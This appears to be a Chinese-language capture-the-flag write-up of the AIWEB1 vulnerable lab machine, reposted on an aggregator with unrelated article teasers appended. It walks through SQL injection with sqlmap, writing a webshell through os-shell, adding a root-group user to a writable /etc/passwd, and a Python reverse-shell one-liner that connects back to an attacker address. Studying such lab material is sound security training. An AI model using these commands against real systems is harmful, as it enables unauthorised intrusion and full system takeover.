AIWEB1综合靶场通关教程,从外网打到内网【附靶场环境】

news2024/11/15 10:55:05

前言

靶场获取后台回【aiweb1】

下载之后设置为nat模式

image-20240802134452085

启动即可,不需要登录

image-20240802134504398

靶机复现

主机发现

image-20240802142459830

访问即可

image-20240802135046689

信息收集robots.txt文件

image-20240802131537718

访问尝试,原来是什么也没有的,404

image-20240802131634434

我们去访问这个上级目录,发现有一个id

image-20240802131725462

注入测试

image-20240802131805580

语法错误,存在sql注入漏洞

image-20240802131758770

抓包

image-20240802131923201

sqlmap

image-20240802131955344

爆表

image-20240802132045654

发现表里什么也没有,换思路

image-20240802132322476

没有权限

image-20240802132333392

dirb扫一下看看,有一个info.php

image-20240802132418449

网站绝对路径

image-20240802102310051

禁用的函数,没有禁用eval

image-20240802102330233

本地文件包含开启,以及php版本(%00截断,低于5.2),但似乎没什么用

image-20240802102413674

这里我们有两种方法

方式一

通过查找secure_file_priv 的值

1、DBA权限,这里我们发现可以对文件进行读写

sqlmap -u 'http://10.0.0.84/se3reTdir777/#' -data "uid=1&Operation=%E6%8F%90%E4%BA%A4" -p 'uid' --privileges

image-20240802133048751

2、secure_file_priv

image-20240802103137489

image-20240802103735767

image-20240802103735767

方式二

从phpinfo中的网站绝对路径进行拼接尝试

image-20240802104005173

image-20240802104005173

image-20240802103844650

image-20240802103844650

image-20240802131255632

image-20240802131255632

有了绝对允许上传文件的角度路径那么我们就能使用sqlmap获取shell

sqlmap获取shell

使用sqlmap的oshell

osshell原理

通过sqlmap -v 5 参数可以查看流量包

image-20240802104556564

image-20240802104556564

通过分析,得到sqlmap的osshell原理就是,通过into outfile/into dumpfile写文件的方式进行文件写入

image-20240802104629208

image-20240802104629208

然后再进行访问这个上传的写入

image-20240802104842231

image-20240802104842231

sqlmap会向这个上传的网站目录写入两个文件

1、文件上传木马文件

image-20240802105002453

image-20240802105327076

2、命令执行文件

image-20240802105104933

文件上传成功后,即可执行命令(与蚁剑不兼容)

image-20240802105247675

注意:如果你退出了这个osshell,那么这两个文件都会自动删除,导致执行不了命令

这是会话维持中,可以执行命令

image-20240802130941177

会话断开

image-20240802105431966

断开后尝试执行命令

image-20240802131009445

上传成功后,没有找到这个flag.txt文件,应该是没有权限读取

10=system('find / -name flag*');

image-20240802111914541

查看/etc/passwd权限,发现漏洞,竟然可以读写文件,我们追加一个用户

image-20240802114512582

新加用户之前创建一个登录密码

perl -le 'print crypt("123456","addedsalt")'

image-20240802114920192

新加一个用户,分到root组进行提权

echo "test:adrla7IBSfTZQ:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd

image-20240802114841607

靶机发现还有nc

image-20240802115137650

反弹shell,查看攻击机ip地址

image-20240802112206063

靶机nc发现没有-e参数,反弹不了shell

image-20240802121408943

看看靶机有没有python

image-20240802121454467

很好,有python,我们使用python反弹shell,攻击机开启监听

image-20240802121545185

中间我断网了,ip地址变了一下,之后操作都是这个ip

image-20240802121757867

我们尝试使用python反弹shell

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.0.0.7',80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

image-20240802125842841

如果没有成功,就多试几次

image-20240802125822206

我们尝试切换用户,提示必须从终端运行

image-20240802121900053

这个问题搞我半天,后来发现可以使用python调用本地shell即终端升级

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

su test
123456

image-20240802130105974

模糊查找flag的位置

image-20240802130600388

cat 即可

image-20240802130206310

感谢观看!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1976336.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

基于Protobuf的RPC

先上UserServer提供服务的函数要求proto文件内容: syntax"proto3"; package fixbug; option cc_generic_servicestrue; message LoginRequest {bytes name1;bytes pwd2; } message LoginResponse {ResultCode result1;bool sucess2; } #调用远程服务的入…

JAVA游戏源码:跑酷|大学生练手项目

学习java朋友们,福利来了,今天小编给大家带来了一款跑酷源码。注意:此源码仅供学习使用!! 源码搭建和讲解 启动main入口: //************************************************************************ // ************完整源码…

AcWing食物链

Q1:怎么判断X和Y是不是同类? A:判断这俩是不是在一个集合中,如果在同一个集合中,那么判断X到祖先节点的距离D[X]和D[Y]到祖先节点的距离是否有D[X]%3D[Y]%3,也就是3同余 若果是,那么是同类。如果X和Y不在一个集合里面,那么把X和Y…

护网总结汇报PPT一键生成,还要啥售前工程师

【文末送:技战法】 干技术的,特别是干安服的,你让我日个站觉得没问题,你让我写个文档我挠挠头,抓抓背也能凑一篇,但是你要让我写个ppt,那我觉得你在为难我。 报告我都写好了,为啥还…

Eclipse Debug 配置

创建和使用 Debug 配置 Eclipse Debug 配置类似于运行配置但它是用于在调试模式下开启应用。 打开 Debug 配置对话框步骤为:Run > Debug Configurations 。 从左侧列表中选择 "Java Application" 选项来选择要调试的 Java 代码。 对话框中的描述信息…

24年电赛——自动行驶小车(H题)MSPM0G3507-编码电机驱动与通用PID

一、编码电机驱动 编码电机的详情可以查看此篇文章: stm32平衡小车--(1)JGB-520减速电机tb6612(附测试代码)_jgb520-CSDN博客 简单来说,编码电机的驱动主要是给一个 PWM 和一个正负级就能驱动。PWM 的大小…

AI PC处理器架-低功耗、NPU算力、大模型

AI PC处理器架构变化:ARM低功耗、引入NPU算力、大模型落地端侧 ARM架构以简洁的指令集设计,快速执行每条命令,实现低功耗下的高效性能。其核心理念是节能和效率,为电池驱动设备提供了理想选择。相较之下,x86架构虽指令…

Linux--shell脚本语言—/—<1>

一、shell简介 Shell是一种程序设计语言。作为命令语言,它交互式解释和执行用户输入的命令或者自动地解释和执行预先设定好的一连串的命令;作为程序设计语言,它定义了各种变量和参数,并提供了许多在高级语言中才具有的控制结构&am…

【practise】大数相加、大数相乘

通常,我们的int、long long类型都有最大的数字上限,也就是说再大了会有溢出问题,那么很大的数字是怎么进行运算的呢? 其中一种方法是把很大的数字转变成字符串存放到string中,然后用代码对字符串进行处理,…

PHP最新可用获取QQ昵称API接口源码_非第三方

PHP最新可用获取QQ昵称API接口源码,运行环境为php7-8都可以,内容为直接调用QQ空间接口 在需要展示QQ昵称处,直接调用以下函数就可以。 例如:get_qq_nick(123456)就会直接输出123456的qq号昵称。 API源码下载:QQ昵称AP…

【C语言】字符函数和字符串函数详解

🦄个人主页:小米里的大麦-CSDN博客 🎏所属专栏:https://blog.csdn.net/huangcancan666/category_12718530.html 🎁代码托管:黄灿灿 (huang-cancan-xbc) - Gitee.com ⚙️操作环境:Visual Studio 2022 目录 一、引言 内容一览 一、strlen …

一拖三无线充底座-带给你极致的便利生活

随着科技的不断进步,无线充电技术已经逐渐渗透到我们日常生活的方方面面,一拖三无线充底座作为其中的佼佼者,以其高效、便捷的特点受到广大用户的青睐。本文将从电磁感应原理、多线圈设计、频率匹配、电能传输、功率分配以及充电管理六个方面…

【Rust日报】终端表格查看工具

[new ver] Tabiew v0.6.1 Tabiew 是一个轻量级的、基于终端的应用程序,用于查看和查询分隔符分隔值格式的文档,例如 CSV 或 TSV 文件。 功能如下: 📊 表格视图: 通过易于导航的表格视图来探索数据。🔍 工作表视图: 深入…

深入剖析隐私安全测试:在数字化时代的守护者

大家好,我是一名_全栈_测试开发工程师,已经开源一套【自动化测试框架】和【测试管理平台】,欢迎大家关注我,和我一起【分享测试知识,交流测试技术,趣聊行业热点】。 一、引言 在日新月异的数字化浪潮中&…

FPGA开发——基于Quartus的工程建立以及下载仿真全过程

一、概述 在使用了这么久的FPGA之后,才发现前面光发了各个设计的设计文件和测试问价,还没有发过怎么利用我们编写的代码进行仿真和使用软件进行工程建立和下载验证的过程,今天就补发一篇Quartus的工程建立以及下载仿真全过程。 二、文件夹建…

程序执行的环境和预处理

目录: 思维导图 一 程序的翻译环境 二 程序的执行环境 三 C 语言程序的编译和链接 四 预定义符号 五 预处理指令 六 宏和函数对比 七 预处理操作符# 和 ## 八 命令定义 九 预处理指令#include 十 预处理指令#undef 十一 条件编译 WeChat_2024073122290…

JavaScript 打印 V 和倒 V 图案的程序(Program to print V and inverted-V pattern)

倒 V 型模式:给定 n 的值,打印倒 V 型模式。示例: 输入:n 5 输出 : E D D C C B B A A 输入:n 7 输出 : G F F E E D D C C B B A…

中药养发护发

按照中医理论,头发和肝肾有密切联系,肝主血,肾藏精, 其华在发,肝肾强健,上荣于头,则毛发乌黑浓密. 中药育发的应用 以当归,天麻,桑疹子养血润发,配合干姜祛风活血,能通畅经络, 加快循环,激活毛囊,能促进皮肤组织营养成分吸收和废弃物的排泄,改善 头发生态. 用苦参 皂角 清热化…

yum仓库的制作与使用

目录 前言: 1 查看系统内核 2 获取网络源 3 搭建yum网络仓库 4 rpm包的下载 4.1 将rpm包下载至本地 4.2 对下载的rpm包进行备份 5 制作本地yum源 5.1 软件仓库制作工具createrepo 5.2 使用createrepo创建本地yum仓库 6 搭建docker本地仓库 前言&#x…

【Dash】使用 HTML 和 CSS 创建图表

一、Styling Your App The examples in the previous section used Dash HTML Components to build a simple app layout, but you can style your app to look more professional. This section will give a brief overview of the multiple tools that you can use to enhan…